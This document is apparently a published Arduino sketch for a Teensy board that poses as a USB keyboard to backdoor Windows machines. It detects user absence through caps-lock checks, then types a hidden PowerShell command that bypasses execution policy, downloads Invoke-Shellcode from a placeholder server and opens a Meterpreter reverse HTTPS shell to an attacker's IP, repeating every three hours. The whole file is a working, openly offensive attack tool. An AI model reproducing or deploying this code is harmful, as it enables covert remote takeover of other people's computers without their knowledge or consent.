Teensy code for backdooring USB devices

backdoor.ino

// Copyright (c) 2017, Brandan Geise [coldfusion]
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in all
// copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
#include "usb_private.h"
#include "usb_api.h"
int ledPin = 11;

void setup() {
  delay (120000); //Wait on start, just because = 2 min
}

void loop() {
  delay(2000); // Time between attack checks
  if (!IsCapsOn()){send_caps();} //Turn on caps lock for trap
  int userState = 0;
  for (int m=9; m>=0; m--) { //Number of caps lock checks before attack, 10 checks = approx 60 sec
    delay(3000); //Delay between caps lock check iterations
    if (IsCapsOn()) {
      delay(3000); //Delay after caps lock is found to be on
    } else {
      userState = userState + 1;
    }
  }
  
  if (userState > 0) {
    delay(3600000); //Time to wait if user is detected = 60 mins
  } else {
    //Go Time
    ctrl_alt();
    send_caps();
    min_windows();
    delay(500);
    UserCmd("powershell -ep bypass -w hidden -nop -c IEX (New-Object Net.WebClient).DownloadString('http://YOUR_SERVER.com/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost YOUR_IP -Lport 443 -Force");
    delay(10800000); //Wait 3 hours to run payload again
  }
}

//Execute command as user
void UserCmd(char *Payload) {
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.send_now();
  release_keys();
  delay(500);
  Keyboard.print("cmd.exe");
  send_enter();
  delay(500);
  Keyboard.print(Payload);
  delay(500);
  send_enter();
  delay(500);
  max_windows();
}

//LED key checking for caps lock
int ledkeys(void) {
  return int(keyboard_leds);
}

//Return the state of caps lock
boolean IsCapsOn() {
  if (ledkeys() == 2 || ledkeys() == 3 || ledkeys() == 6 || ledkeys() == 7) {
    return true;
  } else {
    return false;
  }
}

void release_keys() {
  Keyboard.set_key1(0);
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  delay(100);
}

void max_windows() {
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_SHIFT);
  Keyboard.set_key1(KEY_M);
  Keyboard.send_now();
  release_keys();
}

void min_windows() {
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.set_key1(KEY_M);
  Keyboard.send_now();
  release_keys();
}

void send_caps() {
  Keyboard.set_key1(KEY_CAPS_LOCK);
  Keyboard.send_now();
  release_keys();
}

void send_enter() {
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  release_keys();
}

void ctrl_alt() {
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
  Keyboard.send_now();
  release_keys();
}